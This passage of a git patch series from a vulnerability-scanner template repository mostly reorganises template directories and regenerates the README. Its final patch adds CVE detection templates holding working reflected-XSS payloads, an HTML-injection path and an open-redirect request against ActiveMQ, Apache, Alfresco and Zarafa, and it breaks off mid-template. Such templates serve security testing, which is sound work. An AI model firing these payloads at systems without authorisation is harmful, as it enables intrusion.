       - template: cves/2020/CVE-2020-14181.yaml
-      - template: security-misconfiguration/jira-service-desk-signup.yaml
-      - template: security-misconfiguration/jira-unauthenticated-dashboards.yaml
-      - template: security-misconfiguration/jira-unauthenticated-popular-filters.yaml
-      - template: security-misconfiguration/jira-unauthenticated-projects.yaml
-      - template: security-misconfiguration/jira-unauthenticated-user-picker.yaml
+      - template: vulnerabilities/jira/
diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml
index 3202ca6986..f3b7a93901 100644
--- a/workflows/mida-eframework-workflow.yaml
+++ b/workflows/mida-eframework-workflow.yaml
@@ -14,4 +14,4 @@ workflows:
     matchers:
       - name: mida-eframework
         subtemplates:
-          - template: vulnerabilities/mida-eframework-xss.yaml
+          - template: vulnerabilities/other/mida-eframework-xss.yaml
diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml
index 0a35bee6ab..349ce0f23b 100644
--- a/workflows/rabbitmq-workflow.yaml
+++ b/workflows/rabbitmq-workflow.yaml
@@ -10,7 +10,7 @@ info:
 
 workflows:
 
-  - template: panels/rabbitmq-dashboard.yaml
+  - template: exposed-panels/rabbitmq-dashboard.yaml
 
     subtemplates:
-      - template: default-credentials/rabbitmq-default-admin.yaml
\ No newline at end of file
+      - template: default-logins/rabbitmq-default-admin.yaml
\ No newline at end of file
diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml
index e574b531cf..654c9f341e 100644
--- a/workflows/solarwinds-orion-workflow.yaml
+++ b/workflows/solarwinds-orion-workflow.yaml
@@ -9,8 +9,8 @@ info:
   # Old workflows still remains valid, and will be working with all nuclei versions.
 
 workflows:
-  - template: panels/solarwinds-orion.yaml
+  - template: exposed-panels/solarwinds-orion.yaml
     subtemplates:
       - template: cves/2018/CVE-2018-19386.yaml
       - template: cves/2020/CVE-2020-10148.yaml
-      - template: default-credentials/solarwinds-default-admin.yaml
\ No newline at end of file
+      - template: default-logins/solarwinds-default-admin.yaml
\ No newline at end of file
diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml
index a4c9033dfd..996a91be43 100644
--- a/workflows/springboot-workflow.yaml
+++ b/workflows/springboot-workflow.yaml
@@ -15,5 +15,4 @@ workflows:
       - template: cves/2018/CVE-2018-1271.yaml
       - template: cves/2018/CVE-2018-1271.yaml
       - template: cves/2020/CVE-2020-5410.yaml
-      - template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
-      - template: vulnerabilities/springboot-h2-db-rce.yaml
+      - template: vulnerabilities/springboot/
\ No newline at end of file
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 8b08889fc4..5c9a2d1181 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -16,17 +16,4 @@ workflows:
           - template: cves/2019/CVE-2019-15858.yaml
           - template: cves/2019/CVE-2019-6715.yaml
           - template: cves/2019/CVE-2019-9978.yaml
-          - template: files/wordpress-db-backup.yaml
-          - template: files/wordpress-debug-log.yaml
-          - template: files/wordpress-directory-listing.yaml
-          - template: files/wordpress-emergency-script.yaml
-          - template: files/wordpress-installer-log.yaml
-          - template: files/wordpress-tmm-db-migrate.yaml
-          - template: files/wordpress-user-enumeration.yaml
-          - template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
-          - template: vulnerabilities/sassy-social-share.yaml
-          - template: vulnerabilities/w3c-total-cache-ssrf.yaml
-          - template: vulnerabilities/wordpress-social-metrics-tracker.yaml
-          - template: vulnerabilities/wordpress-wordfence-xss.yaml
-          - template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
-          - template: vulnerabilities/easy-wp-smtp-listing.yaml
\ No newline at end of file
+          - template: vulnerabilities/wordpress/

From 3b11f4f2cbcbd6202ffc4a223fc4fb1eb7f2b46a Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Sat, 9 Jan 2021 13:30:44 +0000
Subject: [PATCH 26/85] Auto Update README [Sat Jan  9 13:30:44 UTC 2021]
 :robot:

---
 README.md | 403 +++++++++++++++++++++++++++++-------------------------
 1 file changed, 214 insertions(+), 189 deletions(-)

diff --git a/README.md b/README.md
index 6bc48cbd79..684ca2b63a 100644
--- a/README.md
+++ b/README.md
@@ -15,14 +15,14 @@ An overview of the nuclei template directory including number of templates and H
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 147             | files                     | 50                     |
-| vulnerabilities    | 42    | panels                    | 50                    |
-| technologies       | 41       | security-misconfiguration | 29 |
-| workflows          | 17          | tokens                    | 8                    |
+| cves               | 147             | files                     | 0                     |
+| vulnerabilities    | 0    | panels                    | 0                    |
+| technologies       | 44       | security-misconfiguration | 0 |
+| workflows          | 17          | tokens                    | 0                    |
 | dns                | 6                | fuzzing                   | 6                   |
-| generic-detections | 3 | default-credentials       | 4       |
-| subdomain-takeover | 2 | payloads                  | 2                  |
-| wordlists          | 1          | misc                      | 14                      |
+| generic-detections | 0 | default-credentials       | 0       |
+| subdomain-takeover | 0 | payloads                  | 0                  |
+| wordlists          | 0          | misc                      | 0                      |
 
 
 ### Nuclei templates `v7.3.7` tree overview
@@ -189,11 +189,15 @@ An overview of the nuclei template directory including number of templates and H
 │       ├── CVE-2020-9484.yaml
 │       ├── CVE-2020-9496.yaml
 │       └── CVE-2020-9757.yaml
-├── default-credentials
-│   ├── grafana-default-credential.yaml
-│   ├── rabbitmq-default-admin.yaml
-│   ├── solarwinds-default-admin.yaml
-│   └── tomcat-manager-default.yaml
+├── default-logins
+│   ├── apache
+│   │   └── tomcat-manager-default.yaml
+│   ├── grafana
+│   │   └── grafana-default-credential.yaml
+│   ├── rabbitmq
+│   │   └── rabbitmq-default-admin.yaml
+│   └── solarwinds
+│       └── solarwinds-default-admin.yaml
 ├── dns
 │   ├── azure-takeover-detection.yaml
 │   ├── cname-service-detector.yaml
@@ -201,57 +205,106 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── mx-service-detector.yaml
 │   ├── servfail-refused-hosts.yaml
 │   └── spoofable-spf-records-ptr.yaml
-├── files
-│   ├── apc-info.yaml
-│   ├── cgi-test-page.yaml
-│   ├── composer-config.yaml
-│   ├── docker-registry.yaml
-│   ├── domcfg-page.yaml
-│   ├── druid-monitor.yaml
-│   ├── drupal-install.yaml
-│   ├── ds_store.yaml
-│   ├── elasticsearch.yaml
-│   ├── elmah-log-file.yaml
-│   ├── error-logs.yaml
-│   ├── exposed-kibana.yaml
-│   ├── exposed-svn.yaml
-│   ├── filezilla.yaml
-│   ├── firebase-detect.yaml
-│   ├── git-config.yaml
-│   ├── graylog-api-browser.yaml
-│   ├── htpasswd-detection.yaml
-│   ├── jkstatus-manager.yaml
-│   ├── jolokia.yaml
-│   ├── laravel-env.yaml
-│   ├── lazy-file.yaml
-│   ├── magento-config.yaml
-│   ├── owncloud-config.yaml
-│   ├── package-json.yaml
-│   ├── php-errors.yaml
-│   ├── phpinfo.yaml
+├── exposed-panels
+│   ├── adminer-panel.yaml
+│   ├── aims-password-mgmt-client.yaml
+│   ├── atlassian-crowd-panel.yaml
+│   ├── cisco-asa-panel.yaml
+│   ├── citrix-adc-gateway-detect.yaml
+│   ├── citrix-vpn-detect.yaml
+│   ├── compal-panel.yaml
+│   ├── crxde.yaml
+│   ├── fortinet-fortigate-panel.yaml
+│   ├── fortiweb-panel.yaml
+│   ├── github-enterprise-detect.yaml
+│   ├── gitlab-detect.yaml
+│   ├── globalprotect-panel.yaml
+│   ├── go-anywhere-client.yaml
+│   ├── grafana-detect.yaml
+│   ├── identityguard-selfservice-entrust.yaml
+│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
+│   ├── jira-detect.yaml
+│   ├── jmx-console.yaml
+│   ├── manage-engine-admanager-panel.yaml
+│   ├── mobileiron-login.yaml
+│   ├── netscaler-gateway.yaml
+│   ├── network-camera-detect.yaml
+│   ├── oipm-detect.yaml
+│   ├── parallels-html-client.yaml
+│   ├── phpmyadmin-panel.yaml
+│   ├── polycom-admin-detect.yaml
 │   ├── public-tomcat-instance.yaml
-│   ├── redmine-db-config.yaml
-│   ├── server-private-keys.yaml
-│   ├── server-status-localhost.yaml
-│   ├── shell-history.yaml
-│   ├── sql-dump.yaml
-│   ├── syfmony-profiler.yaml
-│   ├── telerik-dialoghandler-detect.yaml
-│   ├── telerik-fileupload-detect.yaml
-│   ├── tomcat-scripts.yaml
-│   ├── trace-axd-detect.yaml
-│   ├── wadl-files.yaml
-│   ├── web-config.yaml
-│   ├── wordpress-db-backup.yaml
-│   ├── wordpress-debug-log.yaml
-│   ├── wordpress-directory-listing.yaml
-│   ├── wordpress-emergency-script.yaml
-│   ├── wordpress-installer-log.yaml
-│   ├── wordpress-tmm-db-migrate.yaml
-│   ├── wordpress-user-enumeration.yaml
-│   ├── wsdl-detect.yaml
-│   ├── xprober-service.yaml
-│   └── zip-backup-files.yaml
+│   ├── pulse-secure-panel.yaml
+│   ├── rabbitmq-dashboard.yaml
+│   ├── rsa-self-service.yaml
+│   ├── sap-hana-xsengine-panel.yaml
+│   ├── sap-netweaver-detect.yaml
+│   ├── sap-recon-detect.yaml
+│   ├── solarwinds-orion.yaml
+│   ├── sonarqube-login.yaml
+│   ├── sonicwall-management-panel.yaml
+│   ├── sonicwall-sslvpn-panel.yaml
+│   ├── sophos-fw-version-detect.yaml
+│   ├── supervpn-panel.yaml
+│   ├── tikiwiki-cms.yaml
+│   ├── tomcat-manager-pathnormalization.yaml
+│   ├── traefik-dashboard.yaml
+│   ├── virtual-ema-detect.yaml
+│   ├── weave-scope-dashboard-detect.yaml
+│   ├── webeditors.yaml
+│   ├── webmin-panel.yaml
+│   ├── workspace-one-uem.yaml
+│   └── workspaceone-uem-airwatch-dashboard-detect.yaml
+├── exposed-tokens
+│   ├── aws
+│   │   ├── amazon-mws-auth-token-value.yaml
+│   │   └── aws-access-key-value.yaml
+│   ├── generic
+│   │   ├── credentials-disclosure.yaml
+│   │   ├── general-tokens.yaml
+│   │   └── http-username-password.yaml
+│   ├── google
+│   │   ├── fcm-server-key.yaml
+│   │   └── google-api-key.yaml
+│   ├── mailchimp
+│   │   └── mailchimp-api-key.yaml
+│   └── slack
+│       └── slack-access-token.yaml
+├── exposures
+│   ├── apis
+│   │   ├── swagger-api.yaml
+│   │   ├── wadl-api.yaml
+│   │   └── wsdl-api.yaml
+│   ├── backups
+│   │   ├── sql-dump.yaml
+│   │   └── zip-backup-files.yaml
+│   ├── configs
+│   │   ├── composer-config.yaml
+│   │   ├── exposed-svn.yaml
+│   │   ├── git-config-nginxoffbyslash.yaml
+│   │   ├── git-config.yaml
+│   │   ├── htpasswd-detection.yaml
+│   │   ├── laravel-env.yaml
+│   │   ├── magento-config.yaml
+│   │   ├── owncloud-config.yaml
+│   │   ├── package-json.yaml
+│   │   ├── phpinfo.yaml
+│   │   ├── redmine-db-config.yaml
+│   │   ├── server-status-localhost.yaml
+│   │   ├── syfmony-profiler.yaml
+│   │   └── web-config.yaml
+│   ├── files
+│   │   ├── domcfg-page.yaml
+│   │   ├── drupal-install.yaml
+│   │   ├── ds_store.yaml
+│   │   ├── filezilla.yaml
+│   │   ├── lazy-file.yaml
+│   │   ├── server-private-keys.yaml
+│   │   └── xprober-service.yaml
+│   └── logs
+│       ├── elmah-log-file.yaml
+│       ├── error-logs.yaml
+│       └── trace-axd-detect.yaml
 ├── fuzzing
 │   ├── arbitrary-file-read.yaml
 │   ├── basic-auth-bruteforce.yaml
@@ -259,11 +312,13 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── generic-lfi-fuzzing.yaml
 │   ├── iis-shortname.yaml
 │   └── wp-plugin-scan.yaml
-├── generic-detections
-│   ├── basic-xss-prober.yaml
-│   ├── general-tokens.yaml
-│   └── top-15-xss.yaml
-├── misc
+├── helpers
+│   ├── payloads
+│   │   ├── CVE-2020-5776.csv
+│   │   └── CVE-2020-6287.xml
+│   └── wordlists
+│       └── wp-plugins.txt
+├── miscellaneous
 │   ├── basic-cors-flash.yaml
 │   ├── dir-listing.yaml
 │   ├── htaccess-config.yaml
@@ -278,93 +333,46 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── unencrypted-bigip-ltm-cookie.yaml
 │   ├── wp-xmlrpc.yaml
 │   └── xml-schema-detect.yaml
-├── panels
-│   ├── adminer-panel.yaml
-│   ├── aims-password-mgmt-client.yaml
-│   ├── atlassian-crowd-panel.yaml
-│   ├── cisco-asa-panel.yaml
-│   ├── citrix-adc-gateway-detect.yaml
-│   ├── citrix-vpn-detect.yaml
-│   ├── compal.yaml
-│   ├── crxde.yaml
-│   ├── docker-api.yaml
-│   ├── fortinet-fortigate-panel.yaml
-│   ├── fortiweb-panel.yaml
-│   ├── github-enterprise-detect.yaml
-│   ├── gitlab-detect.yaml
-│   ├── globalprotect-panel.yaml
-│   ├── go-anywhere-client.yaml
-│   ├── grafana-detect.yaml
-│   ├── identityguard-selfservice-entrust.yaml
-│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
-│   ├── jenkins-asyncpeople.yaml
-│   ├── jmx-console.yaml
-│   ├── kubernetes-pods.yaml
-│   ├── manage-engine-admanager-panel.yaml
-│   ├── mobileiron-login.yaml
-│   ├── netscaler-gateway.yaml
-│   ├── network-camera-detect.yaml
-│   ├── oipm-detect.yaml
-│   ├── parallels-html-client.yaml
-│   ├── phpmyadmin-panel.yaml
-│   ├── polycom-admin-detect.yaml
-│   ├── pulse-secure-panel.yaml
-│   ├── rabbitmq-dashboard.yaml
-│   ├── rsa-self-service.yaml
-│   ├── sap-hana-xsengine-panel.yaml
-│   ├── sap-netweaver-detect.yaml
-│   ├── sap-recon-detect.yaml
-│   ├── solarwinds-orion.yaml
-│   ├── sonarqube-login.yaml
-│   ├── sonicwall-management-panel.yaml
-│   ├── sonicwall-sslvpn-panel.yaml
-│   ├── sophos-fw-version-detect.yaml
-│   ├── supervpn-panel.yaml
-│   ├── swagger-panel.yaml
-│   ├── tikiwiki-cms.yaml
-│   ├── traefik-dashboard.yaml
-│   ├── virtual-ema-detect.yaml
-│   ├── weave-scope-dashboard-detect.yaml
-│   ├── webeditors.yaml
-│   ├── webmin-panel.yaml
-│   ├── workspace-one-uem.yaml
-│   └── workspaceone-uem-airwatch-dashboard-detect.yaml
-├── payloads
-│   ├── CVE-2020-5776.csv
-│   └── CVE-2020-6287.xml
-├── security-misconfiguration
+├── misconfiguration
 │   ├── aem-groovyconsole.yaml
 │   ├── apache-tomcat-snoop.yaml
+│   ├── apc-info.yaml
 │   ├── aspx-debug-mode.yaml
+│   ├── aws-redirect.yaml
 │   ├── basic-cors.yaml
+│   ├── basic-xss-prober.yaml
+│   ├── cgi-test-page.yaml
 │   ├── django-debug-detect.yaml
+│   ├── docker-api.yaml
+│   ├── docker-registry.yaml
+│   ├── druid-monitor.yaml
 │   ├── drupal-user-enum-ajax.yaml
 │   ├── drupal-user-enum-redirect.yaml
+│   ├── elasticsearch.yaml
+│   ├── exposed-kibana.yaml
 │   ├── exposed-service-now.yaml
 │   ├── front-page-misconfig.yaml
-│   ├── jenkins-stack-trace.yaml
-│   ├── jira-service-desk-signup.yaml
-│   ├── jira-unauthenticated-dashboards.yaml
-│   ├── jira-unauthenticated-popular-filters.yaml
-│   ├── jira-unauthenticated-projects.yaml
-│   ├── jira-unauthenticated-user-picker.yaml
+│   ├── jkstatus-manager.yaml
 │   ├── jupyter-ipython-unauth.yaml
+│   ├── kubernetes-pods.yaml
 │   ├── larvel-debug.yaml
+│   ├── linkerd-ssrf-detect.yaml
 │   ├── manage-engine-ad-search.yaml
+│   ├── php-errors.yaml
 │   ├── put-method-enabled.yaml
 │   ├── rack-mini-profiler.yaml
 │   ├── salesforce-aura-misconfig.yaml
+│   ├── shell-history.yaml
 │   ├── sidekiq-dashboard.yaml
 │   ├── springboot-detect.yaml
+│   ├── symfony-debugmode.yaml
+│   ├── tomcat-scripts.yaml
 │   ├── unauthenticated-airflow.yaml
-│   ├── unauthenticated-jenkin-dashboard.yaml
 │   ├── unauthenticated-nacos-access.yaml
 │   ├── wamp-xdebug-detect.yaml
-│   ├── wordpress-accessible-wpconfig.yaml
 │   └── zenphoto-installation-sensitive-info.yaml
-├── subdomain-takeover
-│   ├── detect-all-takeovers.yaml
-│   └── s3-subtakeover.yaml
+├── takeovers
+│   └── subdomain-takeover.yaml
 ├── technologies
 │   ├── apache-detect.yaml
 │   ├── artica-web-proxy-detect.yaml
@@ -374,16 +382,17 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── clockwork-php-page.yaml
 │   ├── couchdb-detect.yaml
 │   ├── favicon-detection.yaml
+│   ├── firebase-detect.yaml
 │   ├── google-storage.yaml
 │   ├── graphql.yaml
+│   ├── graylog-api-browser.yaml
 │   ├── home-assistant.yaml
 │   ├── jaspersoft-detect.yaml
-│   ├── jira-detect.yaml
+│   ├── jolokia.yaml
 │   ├── kibana-detect.yaml
 │   ├── kong-detect.yaml
 │   ├── liferay-portal-detect.yaml
 │   ├── linkerd-badrule-detect.yaml
-│   ├── linkerd-ssrf-detect.yaml
 │   ├── lotus-domino-version.yaml
 │   ├── magmi-detect.yaml
 │   ├── mrtg-detect.yaml
@@ -401,66 +410,82 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── shiro-detect.yaml
 │   ├── sql-server-reporting.yaml
 │   ├── tech-detect.yaml
+│   ├── telerik-dialoghandler-detect.yaml
+│   ├── telerik-fileupload-detect.yaml
 │   ├── terraform-detect.yaml
 │   ├── tomcat-detect.yaml
 │   ├── tor-socks-proxy.yaml
 │   ├── waf-detect.yaml
 │   ├── weblogic-detect.yaml
 │   └── werkzeug-debugger-detect.yaml
-├── tokens
-│   ├── amazon-mws-auth-token-value.yaml
-│   ├── aws-access-key-value.yaml
-│   ├── credentials-disclosure.yaml
-│   ├── fcm-server-key.yaml
-│   ├── google-api-key.yaml
-│   ├── http-username-password.yaml
-│   ├── mailchimp-api-key.yaml
-│   └── slack-access-token.yaml
 ├── vulnerabilities
-│   ├── bullwark-momentum-series-directory-traversal.yaml
-│   ├── cached-aem-pages.yaml
-│   ├── couchdb-adminparty.yaml
-│   ├── crlf-injection.yaml
-│   ├── discourse-xss.yaml
-│   ├── easy-wp-smtp-listing.yaml
-│   ├── eclipse-help-system-xss.yaml
-│   ├── git-config-nginxoffbyslash.yaml
-│   ├── ibm-infoprint-directory-traversal.yaml
-│   ├── mcafee-epo-rce.yaml
-│   ├── microstrategy-ssrf.yaml
-│   ├── mida-eframework-xss.yaml
-│   ├── moodle-filter-jmol-lfi.yaml
-│   ├── moodle-filter-jmol-xss.yaml
-│   ├── nginx-module-vts-xss.yaml
-│   ├── nuuo-nvrmini2-rce.yaml
-│   ├── open-redirect.yaml
-│   ├── oracle-ebs-bispgraph-file-access.yaml
-│   ├── pdf-signer-ssti-to-rce.yaml
-│   ├── rails6-xss.yaml
-│   ├── rce-shellshock-user-agent.yaml
-│   ├── rce-via-java-deserialization.yaml
-│   ├── rconfig-rce.yaml
-│   ├── sassy-social-share.yaml
-│   ├── sick-beard-xss.yaml
-│   ├── springboot-actuators-jolokia-xxe.yaml
-│   ├── springboot-h2-db-rce.yaml
-│   ├── symantec-messaging-gateway.yaml
-│   ├── symfony-debugmode.yaml
-│   ├── tikiwiki-reflected-xss.yaml
-│   ├── tomcat-manager-pathnormalization.yaml
-│   ├── twig-php-ssti.yaml
-│   ├── vmware-vcenter-lfi-linux.yaml
-│   ├── vmware-vcenter-lfi.yaml
-│   ├── vpms-auth-bypass.yaml
-│   ├── w3c-total-cache-ssrf.yaml
-│   ├── wems-manager-xss.yaml
-│   ├── wordpress-emails-verification-for-woocommerce.yaml
-│   ├── wordpress-social-metrics-tracker.yaml
-│   ├── wordpress-wordfence-xss.yaml
-│   ├── wordpress-wpcourses-info-disclosure.yaml
-│   └── zms-auth-bypass.yaml
-├── wordlists
-│   └── wp-plugins.txt
+│   ├── generic
+│   │   ├── crlf-injection.yaml
+│   │   ├── top-xss-params.yaml
+│   │   └── url-redirect.yaml
+│   ├── ibm
+│   │   ├── eclipse-help-system-xss.yaml
+│   │   └── ibm-infoprint-directory-traversal.yaml
+│   ├── jenkins
+│   │   ├── jenkins-asyncpeople.yaml
+│   │   ├── jenkins-stack-trace.yaml
+│   │   └── unauthenticated-jenkin-dashboard.yaml
+│   ├── jira
+│   │   ├── jira-service-desk-signup.yaml
+│   │   ├── jira-unauthenticated-dashboards.yaml
+│   │   ├── jira-unauthenticated-popular-filters.yaml
+│   │   ├── jira-unauthenticated-projects.yaml
+│   │   └── jira-unauthenticated-user-picker.yaml
+│   ├── moodle
+│   │   ├── moodle-filter-jmol-lfi.yaml
+│   │   └── moodle-filter-jmol-xss.yaml
+│   ├── oracle
+│   │   └── oracle-ebs-bispgraph-file-access.yaml
+│   ├── other
+│   │   ├── bullwark-momentum-series-directory-traversal.yaml
+│   │   ├── cached-aem-pages.yaml
+│   │   ├── couchdb-adminparty.yaml
+│   │   ├── discourse-xss.yaml
+│   │   ├── mcafee-epo-rce.yaml
+│   │   ├── microstrategy-ssrf.yaml
+│   │   ├── mida-eframework-xss.yaml
+│   │   ├── nginx-module-vts-xss.yaml
+│   │   ├── nuuo-nvrmini2-rce.yaml
+│   │   ├── pdf-signer-ssti-to-rce.yaml
+│   │   ├── rce-shellshock-user-agent.yaml
+│   │   ├── rce-via-java-deserialization.yaml
+│   │   ├── rconfig-rce.yaml
+│   │   ├── sick-beard-xss.yaml
+│   │   ├── symantec-messaging-gateway.yaml
+│   │   ├── tikiwiki-reflected-xss.yaml
+│   │   ├── twig-php-ssti.yaml
+│   │   ├── vpms-auth-bypass.yaml
+│   │   ├── wems-manager-xss.yaml
+│   │   └── zms-auth-bypass.yaml
+│   ├── rails
+│   │   └── rails6-xss.yaml
+│   ├── springboot
+│   │   ├── springboot-actuators-jolokia-xxe.yaml
+│   │   └── springboot-h2-db-rce.yaml
+│   ├── vmware
+│   │   ├── vmware-vcenter-lfi-linux.yaml
+│   │   └── vmware-vcenter-lfi.yaml
+│   └── wordpress
+│       ├── easy-wp-smtp-listing.yaml
+│       ├── sassy-social-share.yaml
+│       ├── w3c-total-cache-ssrf.yaml
+│       ├── wordpress-accessible-wpconfig.yaml
+│       ├── wordpress-db-backup.yaml
+│       ├── wordpress-debug-log.yaml
+│       ├── wordpress-directory-listing.yaml
+│       ├── wordpress-emails-verification-for-woocommerce.yaml
+│       ├── wordpress-emergency-script.yaml
+│       ├── wordpress-installer-log.yaml
+│       ├── wordpress-social-metrics-tracker.yaml
+│       ├── wordpress-tmm-db-migrate.yaml
+│       ├── wordpress-user-enumeration.yaml
+│       ├── wordpress-wordfence-xss.yaml
+│       └── wordpress-wpcourses-info-disclosure.yaml
 └── workflows
     ├── artica-web-proxy-workflow.yaml
     ├── basic-auth-workflow.yaml
@@ -483,7 +508,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 424 files**.
+**49 directories, 424 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From df66d17de51f39b48c9db27d83349523ef343fdb Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sat, 9 Jan 2021 19:22:50 +0530
Subject: [PATCH 27/85] Update README.tmpl

---
 .github/scripts/README.tmpl | 19 +++++++++----------
 1 file changed, 9 insertions(+), 10 deletions(-)

diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl
index 88a9083385..b564f8fccf 100644
--- a/.github/scripts/README.tmpl
+++ b/.github/scripts/README.tmpl
@@ -13,16 +13,15 @@ An overview of the nuclei template directory including number of templates and H
 
 ### Nuclei templates `{version}` overview
 
-| Templates          | Counts                           | Templates                 | Counts                                  |
-| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | {countTpl("cves/*")}             | files                     | {countTpl("files")}                     |
-| vulnerabilities    | {countTpl("vulnerabilities")}    | panels                    | {countTpl("panels")}                    |
-| technologies       | {countTpl("technologies")}       | security-misconfiguration | {countTpl("security-misconfiguration")} |
-| workflows          | {countTpl("workflows")}          | tokens                    | {countTpl("tokens")}                    |
-| dns                | {countTpl("dns")}                | fuzzing                   | {countTpl("fuzzing")}                   |
-| generic-detections | {countTpl("generic-detections")} | default-credentials       | {countTpl("default-credentials")}       |
-| subdomain-takeover | {countTpl("subdomain-takeover")} | payloads                  | {countTpl("payloads")}                  |
-| wordlists          | {countTpl("wordlists")}          | misc                      | {countTpl("misc")}                      |
+| Templates       | Counts                          | Templates        | Counts                         |
+| --------------- | ------------------------------- | ---------------- | ------------------------------ |
+| cves            | {countTpl("cves/*")}            | default-logins   | {countTpl("default-logins/*")} |
+| dns             | {countTpl("dns")}               | exposed-panels   | {countTpl("exposed-panels")}   |
+| exposed-tokens  | {countTpl("exposed-tokens/*")}  | exposures        | {countTpl("exposures/*")}      |
+| fuzzing         | {countTpl("fuzzing")}           | helpers          | {countTpl("helpers/*")}        |
+| miscellaneous   | {countTpl("miscellaneous")}     | misconfiguration | {countTpl("misconfiguration")} |
+| takeovers       | {countTpl("takeovers")}         | technologies     | {countTpl("technologies")}     |
+| vulnerabilities | {countTpl("vulnerabilities/*")} | workflows        | {countTpl("workflows")}        |
 
 
 ### Nuclei templates `{version}` tree overview

From 664a6f3b042f7f60f6059cc31650869505d0c263 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sat, 9 Jan 2021 20:15:11 +0530
Subject: [PATCH 28/85] more cves :fire:

---
 cves/2018/CVE-2018-7251.yaml  | 18 ++++++++++++++++++
 cves/2018/CVE-2018-8006.yaml  | 20 ++++++++++++++++++++
 cves/2019/CVE-2019-10092.yaml | 15 +++++++++++++++
 cves/2019/CVE-2019-14223.yaml | 18 ++++++++++++++++++
 cves/2019/CVE-2019-7219.yaml  | 22 ++++++++++++++++++++++
 cves/2019/CVE-2019-9955.yaml  | 18 ++++++++++++++++++
 cves/2020/CVE-2020-1943.yaml  | 22 ++++++++++++++++++++++
 7 files changed, 133 insertions(+)
 create mode 100644 cves/2018/CVE-2018-7251.yaml
 create mode 100644 cves/2018/CVE-2018-8006.yaml
 create mode 100644 cves/2019/CVE-2019-10092.yaml
 create mode 100644 cves/2019/CVE-2019-14223.yaml
 create mode 100644 cves/2019/CVE-2019-7219.yaml
 create mode 100644 cves/2019/CVE-2019-9955.yaml
 create mode 100644 cves/2020/CVE-2020-1943.yaml

diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml
new file mode 100644
index 0000000000..cf0487f22b
--- /dev/null
+++ b/cves/2018/CVE-2018-7251.yaml
@@ -0,0 +1,18 @@
+id: CVE-2018-7251
+
+info:
+  name: AnchorCMS Error Log Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/anchor/errors.log'
+    matchers:
+      - type: word
+        words:
+          - '"date":'
+          - '"message":'
+          - '"trace":['
+        condition: and
diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml
new file mode 100644
index 0000000000..bcf53c36ba
--- /dev/null
+++ b/cves/2018/CVE-2018-8006.yaml
@@ -0,0 +1,20 @@
+id: CVE-2018-8006
+
+info:
+  name: Apache ActiveMQ XSS
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"><script>alert("1")</script>'
+      - type: word
+        words:
+          - "/html"
+        part: header
diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml
new file mode 100644
index 0000000000..1531fab12e
--- /dev/null
+++ b/cves/2019/CVE-2019-10092.yaml
@@ -0,0 +1,15 @@
+id: CVE-2019-10092
+
+info:
+  name: Apache mod_proxy HTML Injection / Partial XSS
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%5cgoogle.com/evil.html'
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/\\google.com/evil.html\">"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml
new file mode 100644
index 0000000000..d0fca33dbf
--- /dev/null
+++ b/cves/2019/CVE-2019-14223.yaml
@@ -0,0 +1,18 @@
+id: CVE-2019-14223
+info:
+  name: Alfresco Share Open Redirect
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/share/page/dologin'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml
new file mode 100644
index 0000000000..3aa09e4f66
--- /dev/null
+++ b/cves/2019/CVE-2019-7219.yaml
@@ -0,0 +1,22 @@
+id: CVE-2019-7219
+
+info:
+  name: Zarafa WebApp Reflected XSS
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
+
+    matchers-condition: and
